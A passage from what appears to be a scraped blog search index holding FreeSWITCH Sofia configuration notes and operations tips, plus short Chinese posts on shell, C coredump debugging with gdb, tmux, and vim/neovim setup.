The final effect of the message-query is to cause a NOTIFY MWI message to be sent to the registering UA (it is used to satisfy terminals that expect MWI without subscribing for it).\nunregister-on-options-fail If set to True with nat-options-ping the endpoint will be unregistered if no answer on OPTIONS packet.\nnat-options-ping With this option set FreeSWITCH will periodically send an OPTIONS packet to all NATed registered endpoints to keep the connection alive. If set to True with unregister-on-options-fail the endpoint will be unregistered if no answer on OPTIONS packet.\nall-reg-options-ping With this option set FreeSWITCH will periodically send an OPTIONS packet to all registered endpoints to keep the connection alive. If set to True with unregister-on-options-fail the endpoint will be unregistered if no answer on OPTIONS packet.\nregistration-thread-frequency Controls how often registrations in FreeSWITCH are checked for expiration. ping-mean-interval Controls the mean interval FreeSWITCH™ will send OPTIONS packet to registered user, by default 30 seconds.\nSubscription force-subscription-expires force subscription expires to a lower value than requested\nforce-subscription-domain all inbound subscription will look in this domain for the users. Comment out to use multiple domains\nPresence manage-presence Enable presence. If you want to share your presence (see dbname and presence-hosts) set this to \u0026ldquo;true\u0026rdquo; on the first profile and enable the shared presence database. Then on subsequent profiles that share presence set this variable to \u0026ldquo;passive\u0026rdquo; and enable the shared presence database there as well.\ndbname Used to share presence info across sofia profiles Name of the db to use for this profile\npresence-hold-state By default when a call is placed on hold, monitoring extensions show that extension as ringing. You can change this behavior by specifying this parameter and one of the following values. 
Available as of commit 1145905 on April 13, 2012.\nconfirmed - Extension appears busy. early (default) - Extension appears to be ringing. terminated - Extension appears idle. presence-hosts A list of domains that have a shared presence in the database specified in dbname. People who use multiple domains per profile can\u0026rsquo;t use this feature anyway, so you\u0026rsquo;ll want to set it to something like \u0026ldquo;DISABLED\u0026rdquo; in this case to avoid getting users from similar domains all mashed together. For multiple domains, also known as multi-tenant, calling 1001 would call all matching users in all domains. Don\u0026rsquo;t use presence-hosts with multi-tenant.\npresence-privacy Optionally globally hide the caller ID from presence notes in distributed NOTIFY messages. For example, \u0026ldquo;Talk 1002\u0026rdquo; would be the presence note for extension 1001 while it is on a call with extension 1002. If the presence privacy tag is set to true, then it would distribute the presence note as \u0026ldquo;On The Phone\u0026rdquo; (without the extension to which it is connected). So any subscribers to 1001\u0026rsquo;s presence would not be able to see who he/she is talking to. http://jira.freeswitch.org/browse/FS-849 This also hides the number in the status \u0026ldquo;hold\u0026rdquo;, \u0026ldquo;ring\u0026rdquo;, \u0026ldquo;call\u0026rdquo; and perhaps others. http://jira.freeswitch.org/browse/FS-4420\nsend-presence-on-register Specify whether or not to send presence information when users register. Default is not to send presence information. 
Valid options:\nfalse true first-only CallerID Related options caller-id type choose one, can be overridden by inbound call type and/or sip_cid_type channel variable Remote-Party-ID header: P-*-Identity family of headers: neither one: pass-callee-id (defaults to true) Disable by setting it to false if your gateway for some reason hates X-headers that it is supposed to ignore\nOther (TO DO) hold-music disable-hold This allows disabling Music On Hold (added in GIT commit e5cc0539ffcbf660637198c698e90c2e30b05c2f, from Fri Apr 30 19:14:39 2010 -0500). This can be useful when the calling device intends to send its own MOH, but nevertheless sends a REINVITE to FreeSWITCH triggering its MOH. This can be done from dialplan also with rtp_disable_hold channel variable.\napply-inbound-acl set which access control lists, defined in acl.conf.xml, apply to this profile\napply-register-acl apply-proxy-acl This allows traffic to be sent to FreeSWITCH via one or more proxy servers. The proxy server should add a header named X-AUTH-IP containing the IP address of the client. FreeSWITCH trusts the proxy because its IP is listed in the proxy server ACL, and uses the value of the IP in this header as the client\u0026rsquo;s IP for ACL authentication (acl defined in apply-inbound-acl).\nrecord-template max-proceeding max number of open dialogs in proceeding\nbind-params if you want to send any special bind params of your own\ndisable-transfer disable transfer which may be undesirable in a public switch\nmanual-redirect enable-3pcc enable-3pcc determines if third party call control is allowed or not. Third party call control is useful in cases where the SIP invite doesn\u0026rsquo;t include an SDP (late media negotiation). 
enable-3pcc can be set to either \u0026rsquo;true\u0026rsquo; or \u0026lsquo;proxy\u0026rsquo;, true accepts the call right away, proxy waits until the call has been answered then sends the accept\nnonce-ttl TTL for nonce in sip auth\nThis parameter is set to 60 seconds if not set here. It\u0026rsquo;s used to determine how long to store the user registration record in the sip_authentication table. The expires field in the sip_authentication table is this value plus the expires set by the user agent.\nsql-in-transactions If set to true (default), it will instruct the profile to wait for 500 SQL statements to accumulate or 500ms to elapse and execute them in a transaction (to boost performance).\nodbc-dsn If you have ODBC support and a working dsn you can use it instead of SQLite\nmwi-use-reg-callid username If you wish to hide the fact that you are using FreeSWITCH in the SDP message (Specifically the o= and s= fields), then set the username param under the profile. This has no relation whatsoever with the username parameter when we\u0026rsquo;re dealing with gateways. If this value is left unset the system defaults to using FreeSWITCH as the username parameter with the o= and s= fields.\nExample: . v=0. o=root 1346068950 1346068951 IN IP4 1.2.3.4. s=root. c=IN IP4 1.2.3.4. t=0 0. m=audio 26934 RTP/AVP 18 0 101 13. a=fmtp:18 annexb=no. a=rtpmap:101 telephone-event/8000. a=fmtp:101 0-16. a=ptime:20.\nwhen you set Directory of Users To allow users to register with the server, the user information must be specified in the conf/directory/default/*xml file. 
To dynamically specify what users can register, use Mod xml curl\nDefault Configuration File From the FreeSWITCH Github repository\u0026rsquo;s vanilla configurations ([conf/vanilla/autoload_configs/sofia.conf.xml](https://github.com/signalwire/freeswitch/blob/master/conf/vanilla/autoload_configs/sofia.conf.xml)): conf/autoload_configs/sofia.conf.xml \u0026lt;global_settings\u0026gt; \u0026lt;!\u0026ndash; the new format for HEPv2/v3 and capture ID protocol:host:port;hep=2;capture_id=200;\n\u0026ndash;\u0026gt; \u0026lt;/global_settings\u0026gt;\nshutdown and restart FreeSWITCH (or) unload and load mod_sofia If you\u0026rsquo;ve only made changes to a particular profile, you may simply (WARNING: will drop all calls associated with this profile):\nsofia profile restart reloadxml Security Features SIP TLS for secure signaling. SRTP for secure media delivery. The Auth section above for authentication settings. 参考 https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files ","permalink":"https://wdd.js.org/freeswitch/sofia-config/","summary":"About Sofia is a FreeSWITCH™ module (mod_sofia) that provides SIP connectivity to and from FreeSWITCH in the form of a User Agent. A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for handling a certain network protocol; the network protocol in Sofia\u0026rsquo;s case is SIP. Sofia is the general name of any User Agent in FreeSWITCH using the SIP network protocol. 
For example, Sofia receives calls sent to FreeSWITCH from other SIP User Agents (UAs), sends calls to other UAs, acts as a client to register FreeSWITCH with other UAs, lets clients register with FreeSWITCH, and connects calls (i.","title":"Sofia 模块全部配置"},{"content":"安装单个模块 make mod_sofia-install make mod_ilbc-install fs-cli事件订阅 /event plain ALL /event plain CHANNEL_ANSWER sofia 帮助文档 sofia help USAGE: -------------------------------------------------------------------------------- sofia global siptrace \u0026lt;on|off\u0026gt; sofia capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia profile \u0026lt;name\u0026gt; [start | stop | restart | rescan] [wait] flush_inbound_reg [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [reboot] check_sync [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [register | unregister] [\u0026lt;gateway name\u0026gt; | all] killgw \u0026lt;gateway name\u0026gt; [stun-auto-disable | stun-enabled] [true | false]] siptrace \u0026lt;on|off\u0026gt; capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia \u0026lt;status|xmlstatus\u0026gt; profile \u0026lt;name\u0026gt; [reg [\u0026lt;contact str\u0026gt;]] | [pres \u0026lt;pres str\u0026gt;] | [user \u0026lt;user@domain\u0026gt;] sofia \u0026lt;status|xmlstatus\u0026gt; gateway \u0026lt;name\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; sofia help -------------------------------------------------------------------------------- 开启消息头压缩 \u0026lt;param name=\u0026#34;enable-compact-headers\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt; fs需要重启\n呼叫相关指令 # 显示当前呼叫 show calls # 显示呼叫数量 show calls count # 挂断某个呼叫 uuid_kill 58579bd2-db78-4c7e-a666-0f16e19be643 # 挂断所有呼叫 hupall # sip抓包 sofia profile internal siptrace on sofia profile external siptrace on # 拨打某个用户并启用echo回音 originate 
user/1000 \u0026amp;echo 正则测试 在fs_cli里面可以用regex快速测试正则是否符合预期结果\nregex 123123 | \d regex 123123 | ^\d* 变量求值 eval $${mod_dir} eval $${recording_dir} 修改UA信息 sofia_external.conf.xml sofia_internal.conf.xml \u0026lt;param name=\u0026#34;user-agent-string\u0026#34; value=\u0026#34;wdd\u0026#34;/\u0026gt; \u0026lt;param name=\u0026#34;username\u0026#34; value=\u0026#34;wdd\u0026#34;/\u0026gt; 修改之后需要rescan profile.\nmod_distributor的两个常用指令 # reload distributor_ctl reload # 求值 eval ${distributor(distributor_list)} 自动接听回音测试 \u0026lt;extension name=\u0026#34;wdd_echo\u0026#34;\u0026gt; \u0026lt;condition field=\u0026#34;destination_number\u0026#34; expression=\u0026#34;^8002\u0026#34;\u0026gt; \u0026lt;action application=\u0026#34;info\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;action application=\u0026#34;answer\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;action application=\u0026#34;echo\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;/condition\u0026gt; \u0026lt;/extension\u0026gt; odbc-dsn配置错误,fs进入假死状态 最近遇到一个奇怪的问题,相同的fs镜像,在一个环境正常运行,但是在进入另一个环境的时候,fs进程运行起来了,但是所有的功能都异常,仿佛进入了假死状态。并且控制台的日志输出也没有什么有用的信息。\n后来,我想起来以前曾经遇到过这个问题。\n这个fs的镜像中没有编译odbc相关的依赖,但是看sofia_external.conf.xml和sofia_internal.conf.xml, 却有odbc相关的配置。\n\u0026lt;param name=\u0026#34;odbc-dsn\u0026#34; value=\u0026#34;....\u0026#34;\u0026gt; 所以只要把这个odbc-dsn的配置注释掉,fs就正常运行了。\n取消session-timer 某些情况下fs会对呼入的电话,在通话时长达到1分钟的时候,向对端发送一个re-invite, 实际上这还是一个invite请求,只是to字段有了tag参数。这个机制叫做session-timer, 具体定义在RFC4028中。\n但是某些SIP终端可能不支持re-invite, 然后不对这个re-invite做回应,或者回应了一个错误的状态码,都会导致这通呼叫异常挂断。\n在internal.xml中修改如下行:\n\u0026lt;param name=\u0026#34;enable-timer\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt; RTP失活超时检测 某个时刻开始,客户端无法再向FS发送流媒体了。例如客户端Web页面关闭,或者浏览器关闭。\n但是在这种场景下,FS还是会向客户端发送一段时间的媒体流,然后再发送BYE消息。那么,我们如何控制这个RTP失活的检测时间呢?\n在internal.xml或者external.xml中,有以下参数,可以控制检测RTP超时时间。\nrtp-timeout-sec rtp超时秒数 rtp-hold-timeout-sec rtphold超时秒数 
\u0026lt;param name=\u0026#34;rtp-timeout-sec\u0026#34; value=\u0026#34;10\u0026#34;/\u0026gt; \u0026lt;param name=\u0026#34;rtp-hold-timeout-sec\u0026#34; value=\u0026#34;10\u0026#34;/\u0026gt; sofia profile internal restart\nfs 配置多租户分机 分机的相关配置都是位于conf/directory目录中, 我的directory目录中只有一个default.xml文件\n\u0026lt;include\u0026gt; \u0026lt;domain name=\u0026#34;123.cc\u0026#34;\u0026gt; \u0026lt;user id=\u0026#34;1000\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;user id=\u0026#34;1001\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;/domain\u0026gt; \u0026lt;domain name=\u0026#34;abc.cc\u0026#34;\u0026gt; \u0026lt;user id=\u0026#34;1000\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;user id=\u0026#34;1001\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;/domain\u0026gt; \u0026lt;/include\u0026gt; fs状态转移图 ","permalink":"https://wdd.js.org/freeswitch/tips/","summary":"安装单个模块 make mod_sofia-install make mod_ilbc-install fs-cli事件订阅 /event plain ALL /event plain CHANNEL_ANSWER sofia 帮助文档 sofia help USAGE: -------------------------------------------------------------------------------- sofia global siptrace \u0026lt;on|off\u0026gt; sofia capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia profile \u0026lt;name\u0026gt; [start | stop | restart | rescan] [wait] flush_inbound_reg [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [reboot] check_sync [\u0026lt;call_id\u0026gt; | 
\u0026lt;[user]@domain\u0026gt;] [register | unregister] [\u0026lt;gateway name\u0026gt; | all] killgw \u0026lt;gateway name\u0026gt; [stun-auto-disable | stun-enabled] [true | false]] siptrace \u0026lt;on|off\u0026gt; capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia \u0026lt;status|xmlstatus\u0026gt; profile \u0026lt;name\u0026gt; [reg [\u0026lt;contact str\u0026gt;]] | [pres \u0026lt;pres str\u0026gt;] | [user \u0026lt;user@domain\u0026gt;] sofia \u0026lt;status|xmlstatus\u0026gt; gateway \u0026lt;name\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; sofia help -------------------------------------------------------------------------------- 开启消息头压缩 \u0026lt;param name=\u0026#34;enable-compact-headers\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt; fs需要重启","title":"FS常用运维手册"},{"content":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; sofia profile internal restart \u0026gt; sofia profile external restart ","permalink":"https://wdd.js.org/freeswitch/media-settings/","summary":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; 
sofia profile internal restart \u0026gt; sofia profile external restart ","permalink":"https://wdd.js.org/freeswitch/media-settings/","summary":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; sofia profile internal restart \u0026gt; sofia profile external restart ","title":"FreeSWITCH 媒体相关操作"},{"content":"复制文本到剪贴板 sudo apt install xclip vim ~/.zshrc\nalias copy=\u0026#39;xclip -selection clipboard\u0026#39; 这样我们就可以用copy命令来拷贝文件内容到系统剪贴板了。\ncopy aaa.txt 判断工作区是否clean if [ -z \u0026#34;$(git status --porcelain)\u0026#34; ]; then # Working directory clean else # Uncommitted changes fi ","permalink":"https://wdd.js.org/posts/2022/05/shell-101/","summary":"复制文本到剪贴板 sudo apt install xclip vim ~/.zshrc\nalias copy=\u0026#39;xclip -selection clipboard\u0026#39; 这样我们就可以用copy命令来拷贝文件内容到系统剪贴板了。\ncopy aaa.txt 判断工作区是否clean if [ -z \u0026#34;$(git status --porcelain)\u0026#34; ]; then # Working directory clean else # Uncommitted changes fi ","title":"Shell 教程技巧"},{"content":"开启coredump #如果该命令的返回值是0,则表示不开启coredump ulimit -c # 开启coredump ulimit -c unlimited 准备c文件 #include\u0026lt;stdio.h\u0026gt; void crash() { char * p = NULL; *p = 0; } int main(){ printf(\u0026#34;hello world 1\u0026#34;); int phone [4]; phone[232] = 12; crash(); return 0; } 编译执行 gcc -g hello.c -o hello ./hello 之后程序崩溃,产生core文件。\ngdb分析 gdb 启动的二进制文件 core文件\ngdb ./hello ./core 之后输入: bt full 可以查看到更详细的信息\n➜ c-sandbox gdb ./hello ./core GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later \u0026lt;http://gnu.org/licenses/gpl.html\u0026gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \u0026#34;show copying\u0026#34; and \u0026#34;show warranty\u0026#34; for details. This GDB was configured as \u0026#34;arm-linux-gnueabihf\u0026#34;. Type \u0026#34;show configuration\u0026#34; for configuration details. For bug reporting instructions, please see: \u0026lt;http://www.gnu.org/software/gdb/bugs/\u0026gt;. Find the GDB manual and other documentation resources online at: \u0026lt;http://www.gnu.org/software/gdb/documentation/\u0026gt;. 
For help, type \u0026#34;help\u0026#34;. Type \u0026#34;apropos word\u0026#34; to search for commands related to \u0026#34;word\u0026#34;... Reading symbols from ./hello...done. [New LWP 25571] Core was generated by `./hello\u0026#39;. Program terminated with signal SIGSEGV, Segmentation fault. #0 0x0001045c in crash () at hello.c:6 6 *p = 0; (gdb) bt full #0 0x0001045c in crash () at hello.c:6 p = 0x0 #1 0x00010490 in main () at hello.c:13 phone = {66328, 0, 0, 0} ","permalink":"https://wdd.js.org/posts/2022/05/c-and-gdb/","summary":"开启coredump #如果该命令的返回值是0,则表示不开启coredump ulimit -c # 开启coredump ulimit -c unlimited 准备c文件 #include\u0026lt;stdio.h\u0026gt; void crash() { char * p = NULL; *p = 0; } int main(){ printf(\u0026#34;hello world 1\u0026#34;); int phone [4]; phone[232] = 12; crash(); return 0; } 编译执行 gcc -g hello.c -o hello ./hello 之后程序崩溃,产生core文件。\ngdb分析 gdb 启动的二进制文件 core文件\ngdb ./hello ./core 之后输入: bt full 可以查看到更详细的信息\n➜ c-sandbox gdb ./hello ./core GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc.","title":"C和gdb调试"},{"content":"oh my tmux 关闭第二键ctrl-a ctrl-a可以用来移动光标到行首的,不要作为tmux的第二键\nset -gu prefix2 unbind C-a Tmux reload config :source-file ~/.tmux.conf tmux 显示时间 ctrl b + t tmux从当前目录打开新的窗口 bind \u0026#39;\u0026#34;\u0026#39; split-window -c \u0026#34;#{pane_current_path}\u0026#34; bind % split-window -h -c \u0026#34;#{pane_current_path}\u0026#34; bind c new-window -c \u0026#34;#{pane_current_path}\u0026#34; ","permalink":"https://wdd.js.org/posts/2022/05/tmux-faq/","summary":"oh my tmux 关闭第二键ctrl-a ctrl-a可以用来移动光标到行首的,不要作为tmux的第二键\nset -gu prefix2 unbind C-a Tmux reload config :source-file ~/.tmux.conf tmux 显示时间 ctrl b + t tmux从当前目录打开新的窗口 bind \u0026#39;\u0026#34;\u0026#39; split-window -c \u0026#34;#{pane_current_path}\u0026#34; bind % split-window -h -c \u0026#34;#{pane_current_path}\u0026#34; bind c new-window -c \u0026#34;#{pane_current_path}\u0026#34; ","title":"Tmux 常见问题以及解决方案"},{"content":"修改coc-vim的错误提示 
coc-vim的错误提示窗口背景色是粉红,前景色是深红。这样的颜色搭配,很难看到具体的文字颜色。\n所以我们需要把前景色改成白色。\n:highlight CocErrorFloat ctermfg=White 参考 https://stackoverflow.com/questions/64180454/how-to-change-coc-nvim-floating-window-colors\nvim go一直卡在初始化 有可能没有安装二进制工具\n:GoInstallBinaries neovim 光标变成细线解决方案 :set guicursor= ","permalink":"https://wdd.js.org/vim/vim-faq/","summary":"修改coc-vim的错误提示 coc-vim的错误提示窗口背景色是粉红,前景色是深红。这样的颜色搭配,很难看到具体的文字颜色。\n所以我们需要把前景色改成白色。\n:highlight CocErrorFloat ctermfg=White 参考 https://stackoverflow.com/questions/64180454/how-to-change-coc-nvim-floating-window-colors\nvim go一直卡在初始化 有可能没有安装二进制工具\n:GoInstallBinaries neovim 光标变成细线解决方案 :set guicursor= ","title":"Vim 常见问题以及解决方案"},{"content":"我承认,vscode很香,但是vim的开发方式也让我无法割舍。\nvscode中有个vim插件,基本上可以满足大部分vim的功能。\n这里我定义了我在vim常用的leader快捷键。\n设置,为默认的leader \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, 在Normal模式能command+c复制 \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, leader快捷键 在插入模式按jj会跳出插入模式 ,a: 跳到行尾部,并进入插入模式 ,c: 关闭当前标签页 ,C: 关闭其他标签页 ,j: 跳转到左边标签页 ,k: 跳转到右边标签页 ,w: 保存文件 ,t: 给出提示框 ,b: 显示或者隐藏文件树窗口 完整的配置 \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, \u0026#34;vim.insertModeKeyBindings\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;j\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;\u0026lt;Esc\u0026gt;\u0026#34; ] } ], \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, \u0026#34;vim.normalModeKeyBindingsNonRecursive\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;a\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;A\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;c\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.closeActiveEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ 
\u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;C\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.closeOtherEditors\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.previousEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;k\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.nextEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;w\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.files.save\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;t\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;editor.action.showHover\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;b\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.toggleSidebarVisibility\u0026#34; ] }, ] ","permalink":"https://wdd.js.org/vim/vscode-vim/","summary":"我承认,vscode很香,但是vim的开发方式也让我无法割舍。\nvscode中有个vim插件,基本上可以满足大部分vim的功能。\n这里我定义了我在vim常用的leader快捷键。\n设置,为默认的leader \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, 在Normal模式能command+c复制 \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, leader快捷键 在插入模式按jj会跳出插入模式 ,a: 跳到行尾部,并进入插入模式 ,c: 关闭当前标签页 ,C: 关闭其他标签页 ,j: 跳转到左边标签页 ,k: 跳转到右边标签页 ,w: 保存文件 ,t: 给出提示框 ,b: 显示或者隐藏文件树窗口 完整的配置 \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, \u0026#34;vim.insertModeKeyBindings\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;j\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;\u0026lt;Esc\u0026gt;\u0026#34; ] } ], \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, 
\u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, \u0026#34;vim.normalModeKeyBindingsNonRecursive\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;a\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;A\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;c\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.","title":"vscode vim插件自定义快捷键"},{"content":"neovim如何与系统剪贴板交互? neovim和系统剪贴板的交互方式和vim的机制是不同的,所以不要先入为主的用vim的方式使用neovim。\nneovim需要外部的程序与系统剪贴板进行交互,参考:help clipboard\nneovim按照如下的优先级方式选择交互程序:\n- |g:clipboard| - pbcopy, pbpaste (macOS) - wl-copy, wl-paste (if $WAYLAND_DISPLAY is set) - xclip (if $DISPLAY is set) - xsel (if $DISPLAY is set) - lemonade (for SSH) https://github.com/pocke/lemonade - doitclient (for SSH) http://www.chiark.greenend.org.uk/~sgtatham/doit/ - win32yank (Windows) - termux (via termux-clipboard-set, termux-clipboard-get) - tmux (if $TMUX is set) 因为我的操作系统是linux, 所以方便的方式是直接安装xclip。\nsudo pacman -Syu xclip 两个系统剪贴板有何不同? 对于windows和mac来说,只有一个系统剪贴板,对于linux有两个。\n剪贴板,鼠标选择剪贴板 剪贴板,选择之后复制剪贴板 如下图,我用鼠标选择了12345, 但是没有按ctrl + c, 这时候你打开nvim, 执行:reg, 可以看到注册器\n\u0026#34;* 12345 如果按了ctrl + c\n\u0026#34;* 12345 \u0026#34;+ 12345 所以,在vim中如果想粘贴系统剪贴板中的内容,可以使用 C-R * 或者 C-R +\n如何把vim buffer中的全部内容复制到系统剪贴板? :%y+ ","permalink":"https://wdd.js.org/vim/clipboard/","summary":"neovim如何与系统剪贴板交互? neovim和系统剪贴板的交互方式和vim的机制是不同的,所以不要先入为主的用vim的方式使用neovim。\nneovim需要外部的程序与系统剪贴板进行交互,参考:help clipboard\nneovim按照如下的优先级方式选择交互程序:\n- |g:clipboard| - pbcopy, pbpaste (macOS) - wl-copy, wl-paste (if $WAYLAND_DISPLAY is set) - xclip (if $DISPLAY is set) - xsel (if $DISPLAY is set) - lemonade (for SSH) https://github.com/pocke/lemonade - doitclient (for SSH) http://www.chiark.greenend.org.uk/~sgtatham/doit/ - win32yank (Windows) - termux (via termux-clipboard-set, termux-clipboard-get) - tmux (if $TMUX is set) 因为我的操作系统是linux, 所以方便的方式是直接安装xclip。\nsudo pacman -Syu xclip 两个系统剪贴板有何不同? 
